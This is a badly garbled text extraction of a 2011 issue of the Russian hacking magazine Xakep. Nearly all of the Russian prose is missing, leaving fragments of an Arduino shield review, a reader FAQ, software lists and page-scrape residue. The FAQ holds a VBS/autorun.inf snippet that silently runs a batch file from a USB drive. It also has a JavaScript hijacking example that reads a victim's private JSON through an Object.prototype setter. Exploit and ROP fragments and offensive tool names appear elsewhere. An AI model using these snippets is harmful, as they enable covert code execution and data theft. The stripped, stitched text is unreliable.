Arduino ( ) Wiring. , C++, digitalWrite (
) analogRead ( ).
- ,
C++.
Arduino USB ArduinoIDE
(arduino.cc/en/Main/Software).
- ,
ATMEL .
,
-. , , ,
.

, , ,
. , ,
.
, .
, .
- .
Shield-?
Shield- ,
.
,
134
Ethernet, . Arduino,
.
, ,
Arduino.
,
(shieldlist.org).

-. : ,
. -
- .
?
, .
, Arduino

. Arduino Mega Arduino
ATmega1280 ATmega2560, ,
, Uno Duemilanova. -
, Mega SPI
! Arduino SPI,

Mega , ,
- 23.
Shield- .
,
Motorshield,
X 08 /151/ 2011

Arduino Uno
aka ladyada (ladyada.net/make/mshield/).
, ,
-. : , . H- L293D, 600
4,5 36 .
, 1,2 .
, ,
, .
Ardumoto L298 Sparkfun
( 2 )
Monster Moto Shield (sparkfun.com/products/10182)
VNH2SP30, 30 41 . , : -
,
, .

Mega
Ethernet
Ethernet
ENC28J60 Microchip
W5100 Wiznet.
SPI, Arduino.
ENC28J60 W5100: 10 /, IP, UDP,
TCP. , W5100
( ).
, W5100,
(SRAM), ( Atmega328 ). : W5100
TCP ,
Atmeg .
Arduino Ethernet
Shield (arduino.cc/en/Main/ArduinoEthernetShield)
Arduino. , :
IP- DHCP;
NTP;
DNS;
RADIUS;
X 08 /151/ 2011
Motorshield Ladyada
Web-
Web-,
.
Freetronics
EthernetShield with PoE (freetronics.com/products/ethernet-shieldwith-poe). Ethernet-
Ethernet, , 2001 ,
IEEE
802.3af. ,
, Ethernet
100
. ,
PoE
SD- .
135
PHREAKING
Freeduino EtherSD shield Ethernet 10/100 microSD

, TCP/
IP. ,
- .
-,
Arduino+Ethernet .
EthernetShield , , ,
, -
. ,
30 Arduino Duemilanova
Mega 2560,
.
SD-
, -
(, GPS-),
. ,
SD-. .
microSD module, Libellium,
(goo.gl/
iHCy4).
Arduino
SD SDHC-, FAT16 () FAT32.
, .
RF- (ASK),
433 313
Arduino VirtualWire,
.
,
,
136

. , -
.

Xbee, Zigbee,

.
,
Arduino.
Xbee Shield, , Libellium
Communication Shield (goo.gl/OZDxl). ,
Xbee. , ,
Xbee. 250
/, 90
( Xbee PRO 1,2 ), ,
( ).
, , - WiFi,
Bluetooth.
WiFly Shield SparkFun (sparkfun.com/products/9954) Bluetooth
module Libellium (cooking-hacks.com/index.php/arduinobluetooth-module-89.html). Xbee
Xbee, Arduino
AT-. ,
Arduino BT (arduino.cc/en/
Main/ArduinoBoardBluetooth), USB-,

Bluetooth.
, .
GSM ,
TTL.
USB,
( , Arduino). , ,
GSM-, X 08 /151/ 2011
WiFly- Sparkfun
microSD- Libellium
,
-
(,
GPS-),

.
GPRS Quadband module for Arduino Libellium
(goo.gl/KueFH), GPRS- SAGEM.
GRPS- ,
.
,
.
, .
: Radiation Sensor Board Libellium ( ).
, , .
Seeeduino Stalker
Arduino- , ,
.
USB Host Shield Arduino ,
.
, TFT-
. LoL-Shield.
, .
Atmega (0, 1 ). 126 ,
914,
Arduino,
, , - Space Invaders.
,
X 08 /151/ 2011
LoL Shield
, , .
, .
LCD-.
- 1602 HD44780 .
Arduino:
!
( ,
ArduinoIDE,
LiquidCrystal).
,
. , Arduino. , 2,54 , (
,
PLS).
,
.
, . !
,
137
PHREAKING
- HD44780
...
. 10-20 ,

analog0, .
PLS
, .
, ,
Arduino ,
.
.
Arduino
- LiquidCrystal.
? ? ,
, -
!
138
!
.
.
, UTF-8 . github.com/mk90. z
X 08 /151/ 2011
1.
, ,
shop.
glc.ru.
2. .
3.

:
e-mail: subscribe@glc.ru;
: (495) 545-09-06;
: 115280, ,
. , 19, ,
5 ., 21,
, .
! ,
.
.
,

500 .
12 2200 .
6 1260 .
,
!

+ + 2 DVD:
162
( 35% , )
12 3890 (24 )
6 2205 (12 )
? info@glc.ru
8(495)663-82-77 ( ) 8 (800) 200-3999 ( ,
, ).
UNITS
faq
united?

faq@real.xakep.ru
Q:
SIP-GSM-?
Oktell SIP-GSM Gateway (www.
A: telsystems.ru/gateways), ,

3G- .
,

ZTE Huawei. ,
, Huawei e1550,
GSM.
, 3G-
,

.

, .
,

. ,
, ,
.
,
SIP-GSM-?

SIP-,

SIP- (asterisk, oktell, sipnet ..).
GSM-SIP-.
140

3G-.
:
Huawei E1550, Huawei E160g, ZTE MF180.
, , : VoIP-GSM
. :
$300 (, ,
700-800 , ). ,
.
bit.ly/aNNQTD.
,
.
, ,
. , ,
iPhone/
iPad, Objective-C - .
Q: - bat- ?
A: , ,
Microsoft ,
.
:
1. myfile.vbs :
Q: Adobe Flash SWF- iOS-.

, Apple
, iPhone/
iPad . ,

?
A: -
2. autorun.inf :
, iOS,
:
, ,
,
,
USB-.
Set WshShell = CreateObject(

"WScript.Shell")
WshShell.Run "cmd.exe /c
[_BAT_]", 0, false
[AutoRun]
UseAutoPlay=1
open=myfile.vbs
X 08 /151/ 2011
GSM-VoIP
3G-
Q: ,
.
,
SSL-. .
SSL- ?
- ?
A: SSL-,
,
. , ( 30 90
). - www.freessl.su.
,
SSL-. ,
,

:
Your Name:
Example: John Smith
Your E-mail:
Example: test@example.com
Phone:
Example: 8(495)2295670
Select the server software used to
generate the CSR:
Example: Apache-SSL
CSR:
Example:
-----BEGIN CERTIFICATE REQUEST----MIIDUDCCArkCAQAwdTEWMBQGA1UEAxMNdGVzd
C50ZXN0LmNvbTESMBAGA1UECxMJ
TWFya2V0aW5nMREwDwYDVQQKEwhUZXN0IE9yZ
zESMBAGA1UEBxMJVGVzdCBDaXR5
.......
Rq+blLr5X5iQdzyF1pLqP1Mck5Ve1eCz0R9/
OekGSRno7ow4TVyxAF6J6ozDaw7e
GisfZw40VLT0/6IGvK2jX0i+t58RFQ8WYTOcT
RlPnkG8B/uV
-----END CERTIFICATE REQUEST-----

CSR (Certificate Signing Request).

,
(Public Key).
X 08 /151/ 2011
GD GUI
Android
openssl ( www.
freessl.su/articles/13).
mod_ssl
Apache (, ).

www.freessl.su/articles/14.
Q: ,
JavaScript hijacking?
A:
- (oxdef.info).
(
- bit.ly/jOMIpv) - .
, -
JSONP.
,
JavaScript
.
, - JSON- -
:
[{"foo":"private data"}]
JS-,
. ,
foo ,
:
Object.prototype.__defineSetter__
("foo", function(x) {
var s = "";
for (f in this) {
s += f + ": " + this[f] + ", ";
}
s += "foo: " + x;
// s
//
//
});
</script>
<script src="http://target.com/
private/data.js"></script>
JSONP, ,
:

,

. :
evilFunction({"paper": "A4", "count":
5})
, ,
.
Q:
, , .
?
A: - ExtJS (www.sencha.com),
-,
. , , ,
,
,
. ExtJS ,
JavaScript
. , , , .
Q: ,

?
A: Google

,
6- . jQuery,
JS-, ,
(jquery.thewikies.com/
browser). .
Q: MySQL?
A:
, , noSQL
,

.
HandlerSocket Plugin,
141
UNITS
,

SQL.

, , ,
750
!
GPU:
OpenCL: NT, raw-MD4, raw-MD5, NSLDAP
raw-SHA1;
CUDA: raw-SHA256, phpass.
John the Ripper,
,
,
ZIP RAR, PDF, SSH-. ighashgpu
(hww.golubev.com/blog).
Q: MBR,
. MBR?
Q:
A: , Android-?
MBR,
Android market Perl- Boot Record
Parsers (www.garykessler.net/software/index.
,
html), :
.
mbrparser DOS/Windows Master
A: . Boot Record (MBR);
bsparser
FAT NTFS.
,
An Examination of
the Standard MBR (bit.ly/kI8AWa).
Q:

. email-.
A:
bulk_extractor
(afflib.org/software/bulk_extractor). C++ , , ,

. , bulk_extractor
,
,

.

HDD, SSD,
, ,
.. , ,
( ,
digital forensics), EXIF , IP/MAC/Email-, URL
..
,

Python.
Q:
MD5 ?
A: , ,
John the Ripper (www.openwall.com/
john) ,
.
-
142
Android ,
- Dalvik Executable
(.dex).
.
dex2jar (code.google.com/p/
dex2jar), .dex-
Java-, JD-GUI (java.decompiler.free.
fr).
smali (code.google.com/p/smali).
Kivlad (www.matasano.com),
Dalvik- Java-,
.
Ruby
Windows, Linux OS X.
Q: , ,
USB?
A: USB-
, , VMware.
(vmx-)
:
usb.analyzer.enable = TRUE
monitor = "debug"
usb.analyzer.maxLine = 8192
mouse.vusb.enable = FALSE

vmware.log.
,
vsusbanalyser (vusb-analyzer.sourceforge.net/
tutorial.html). PCAP-, Ruby vmwusb2pcap.
rb (bit.ly/la7Aju).
Q: call- ,
. 0 ,
1 , ..
- ,
?
A: IVR (. Interactive Voice
Response), ,
call-.
.
IVR
Asterix
(www.asterisk.org).
IVR-
extensions.conf, AGI.
Perl Python,
.
Asterix ,
.

.
IVR
: bit.ly/lNj26k. ,
, , ,
.
Q:
Google,

,

.
,

?
A: , : Duo Security
(www.duosecurity.com) Symantecs VIP
Authentication Service (www.verisign.com).

,
Mobile-OTP (motp.sourceforge.
net). ,
, Java
,
RADIUS- (,
XTRadius), . , Android iPhone
Java- .
,
..z
X 08 /151/ 2011
>Net
Bimoid messenger 1.0.0.48
Bimoid server 1.0.0.36
>>MAC
Adobe Flash Player 10.3.181.34
Audirvana 0.9.4
CandyBar 3.3
Coda 1.7.1
DesktopLyrics 1.3.4
Fluid 1.2
Google Chrome 12.0.742.112
Grep 1.1.9
MenuMeters 1.5
Miro 4.0.2
Opera 11.50
Sequel Pro 0.9.9
Syrinx 2.4.4
Thunderbird 5.0
Transmission 2.32
Tunnelblick 3.2
uTorrent 1.5.4
VirtualBox 4.0.10
WaveMaker 6.3.2
>System
AnyBackup 0.9.1
AxCrypt 1.7.2126
Boomerang 1.0
Defraggler 2.06
Duplicate Commander 2.2
FreeOTFE 5.21
Gpg4win 2.1.0
OSForensics 0.98beta
Pretty Flow 2.0.0.99
VirtualBox 4.0.10
>Security
PAC 3.0.1
del2info 0.1.2
>Net
Empathy 3.0.2
Fetchmail 6.3.20
Firefox 5
Freesa 2.0.0
FtpCube 0.5.1
IPTraf 3.0.0
Mldonkey 3.0.7
Mutt 1.5.21
Net-SNMP 5.7
Opera 11.50
Pidgin 2.9
Quassel 0.7.1
SeaMonkey 2.1
Stunnel 4.38
Thunderbird 5.0
TightVNC 2.0.3
Transmission 2.32
WeeChat 0.3.5
>Devel
amysql 1.1
Anjuta IDE 3.0.3.0
ChiliProject 2.0.0
CImg 1.4.9
Clutter 1.6.16
Eclipse 3.7 Indigo
EKOPath 4
Eric5 5.1.4
libpng 1.5.4
Linguist
Mercurial 1.9
nVidia CUDA 4.0
Prolog 1.4.0
Python-LDAP 2.4.1
SiteFusion 5.4
SmartGit 2.0.5
SymPy 0.7.0
Tornado 2.0
wxWidgets 2.8.12
>System
Amanda 3.3.0
AMD Catalyst 11.6
CheckInstall 1.6.2
ClamAV 0.97.1
Iat 0.1.7
Krusader 2.0.0
Linux Kernel 2.6.39.3
Midnight Commander 4.7.5.2
muCommander 0.8.5
Nvidia 275.09.07
Systemd 29
Vim 7.3
VirtualBox 4.0.10
Wine 1.2.3
Zsh 4.3.12
>Server
Apache 2.2.19
Apache Solr 3.3
Apache Traffic Server 3.0
BIND 9.8.0
CUPS 1.4.7
DHCP 4.2.1
Lighttpd 1.4.29
MiniDLNA 1.0.20
MySQL 5.5.14
OpenLDAP 2.4.26
OpenSSH 5.8
OpenVPN 2.2.1
Postfix 2.8.4
PostgreSQL 9.0.4
Samba 3.5.9
Sendmail 8.14.5
Squid 3.1.14
Mantra Security Toolkit 0.61

Prey 0.5.3
Vega
sslsniff 0.7
ksymhunter
ZAProxy 1.3.1
Skipfish 1.94b
Burp Suite 1.4
FaceNiff 1.9.4
BeEF 0.4.2.7
Durandal 0.5
XSS-Harvest
bsqlbf-v2 2.7
complemento 0.7.7
DOM Snitch v0.707
Ghost-phisher 1.2
honggfuzz 0.3
JMD 1.61
Kivlad 0.1
Nerve
NIELD 0.11
sniffjoke 0.4.1
XSSF 2.1
$
>Multimedia
BurnAware Free
Clementine 0.7.1
DualMonitorTools 1.8
EncodeHD 1.2.238
Evernote 4.4.2
FreeVDF 1.0.1.7
Hamster Free eBook Converter
IrfanView 4.30
ONVIF Device Manager 9.9.4017
puush for Windows
Stellarium 0.11.0
Winamp Media Player 5.62
>Misc
BatteryInfoView 1.00
BleachBit 0.8.8
Console 2.00b
Dexpot 1.5.11
Eraser 6.0.8
KeePass 1.20
ManicTime 1.5.5
notifu 1.6
PasswordMaker Desktop Edition 0.1
PeaZip 3.8
PureText 2.0
Window On Top
Youtube SRT Downloader
>Security
BinVis
bsqlbf-v2 2.7
DOM Snitch v0.707
JMD 1.61
Kivlad 0.1
mona.py 1.0
MysqlPasswordAuditor 1.0
Nerve
NetworkMiner 1.0
OpenPuff v3.30
ophcrack 3.3.1
The Sleuth Kit 3.2.2
WebSurgery
XSSF 2.1
>>UNIX
>Desktop
Darktable 0.9
DockbarX 0.45
Feh 1.14.2
Flphoto 1.3.1
Hugin 2011.0.0
Icewm 1.3.7
KoverArtist 0.7.5
LilyPond 2.15.4
LiVES 1.4.4
OutWiker 1.3.0
Sawfish 1.8.1
Scribus 1.4.0rc5
Solfege 3.20
Stellarium 0.11.0
Synfig Studio 0.63.00
Traverso 0.49.2
VisIt 2.3
Wmii 3.9.2
)
HEX-:
010 Editorfor Windows 3.2
FlexHEX Editor 2.6
Hex Editor Neo Standard 4.97
Hex EditorNeo Free 4.97
Hiew32 Demo
McAfee FileInsight 2.1
radare2-0.7
Python:
ActivePython Community Edition
2.7.2
DreamPie 1.1.1
Eric5 5.1.4
IronPython 2.7
Jython 2.5.2
Komodo Edit 6.1.1
Komodo IDE 6.1.1
PyPy 1.5
PyScripter 2.4.1
Python 2.7.2
Python 3.2.1
Spyder 2.0.12
Stackless Python for Python 2.7.1
Stackless Python for Python 3.2
Wing IDE 101 4.0.3
Wing IDE 4.0.3
BoxCryptor 1.0
CloseTheDoorSetup 0.2.1
DropboxPortableAHK
dropf 0.2.4
EMCO Remote Console 1.0.1
Instantbird 1.0
Logstalgia 1.0.3
Maryfi
MetroTwit beta
Opera 11.50
PuTTYTabManager 0.11
Thunderbird 5.0
Vistumber v10b5
Win7 MAC Address Changer v1.0
beta
WinDump 3.9.5
(
08(151) 2011
>>WINDOWS
>Development
ClickHeat 1.14
FastSharp
x
. 28

: 2
10
.
. 56

SAME ORIGIN POLICY
DNS
REBINDING
$500 000

APPSTORE
t%SPQCPY
t!.BJM3V
t)%.PPSF.FUBTQMPJU
t(FOFSBUJPO$BSCFSQ
t,PIBOB.7$-07&
PHDAYS
2011
08 (151) 2011
. 66
UNITS
HTTP://WWW2

Flash HTML5
MIDOMI
www.midomi.com
GOOGLE
SWIFFY
swiffy.googlelabs.com
,
Shazam SoundHound. :
. , (, ), . -
midomi.
. ,
.
, . ! music
fingerprinting!
HTML5 , Flash
. Flash , .
, iPhone iPad
Flash-. ,
Adobe, . ,
Flash SWF HTML5.
- Google Swiffy. SWF 8 ActionScript 2.0,
WebKit (Chrome, Moible Safari ..).
ADOBE
BROWSERLAB
browserlab.adobe.com
WUNDERLIST
www.wunderlist.com
(
, ),
. Browserlab. ,
Adobe .
,

.
URL .
, ,
, ..
, .
. Wunderlist,
. -, Windows Mac OS X,
Android iPhone/iPad. TODO : - , -. , Wunderlist
,
. , ( github.com/6wunderkinder). , Titanium.
144
X 08 /151/ 2011

:
18-25

XSS Heap overflow
SQL-
, null-byte gigabyte
Black Hat

5

nikitoz@real.xakep.ru
VZLOM
CODING
ALEKSANDR-EHKKERT@RAMBLER.RU
X 10 /141/ 10

Хакер 2011 08 PDF

Загружено:

Сведения о документе

Оригинальное название

Авторское право

Доступные форматы

Поделиться этим документом

Поделиться или встроить документ

Параметры публикации

Этот документ был вам полезен?

Это неприемлемый материал?

Авторское право:

Доступные форматы

Хакер 2011 08 PDF

Оригинальное название:

Загружено:

Авторское право:

Доступные форматы

x 08 (151) 2011

$ 500 000 APPSTORE

Samsung SyncMaster T27A950

ERP-: , Open Source

Anti DNS pinning

Capture The Flag

.: (495) 935-7034, : (495) 545-0906

Microsoft Security Essentials .

WEXLER.HOME 903 Windows 7 .

Intel Core i5-650 3,2 - 4 . CPU

GeForce GTX 460,

. LulzSec, Bethesda, Nintendo, ,

WEXLER TAB 9701

Chaos Constructions 2011. 11-

Samsung SyncMaster T27A950 , , ,

Gigaworks T40 series II ,

JBL Duet III

Physics Gamebox. AppStore

2010 Cover Orange AppStore

WIP-Plugin (WorldIP- Mozilla

SQL- VBULLETIN 4.0.X =>

, John The Ripper, PasswordsPro -

SOS-11006, . Common Services

XITAMI WEB SERVER 2.5B4:

push esp - retn, nop-

Deveper Tools DOM,

0:007> u comctl32!CImageList::_IsSameObject+40 L?2

xchg eax,esp ; esp == 0c0c0c0c

0c0c0c10 7c901db3 ; 2:ntdll!memcpy

ntdll!memcpy 0x2fff 0x23000100 (

- Positive Hack Days .

Same origin policy

, HTTP, web. , , API

Outlook Web Access

CSS History Hack v 2.0

and dword ptr ds:0BBADBEEFh, 0

QWERTY, 12345, GFHJKM

64- MS Windows (Vista,

[3] Boot Configuration Data

Zdez Bil Ya.

Zdez Bil Ya icq.com,

poecx apyo, oope ocy a c 18 e

2010 Rapid7 SANS

KGPU Linux, GPU

CUDA Toolkit Linux

x86_64). , (Developer Drivers for Linux, ).

ATI Stream SDK

Stream SDK , AMD (

CUDA Toolkit, x86_64 x86

CL/cl.h usability... yes

$ sudo apt-get install btrfs-progs

$ sudo apt-get install rsync

$ sudo mkdir /usr/share/xt_geoip

$ patch -p0 < ../ipq_protocols.h.diff

$ sudo apt-get install make gcc libpcap-dev

tar -xzf opendpi-netfilter-wrapper-1.1.tar.gz

iptables -A FORWARD -m opendpi --bittorrent -j DROP

Content Management Framework (CMF)

Hello world Kohana

about_page about. View::factory.

Scripting Layer for Android:

SCOM 48 Management Pack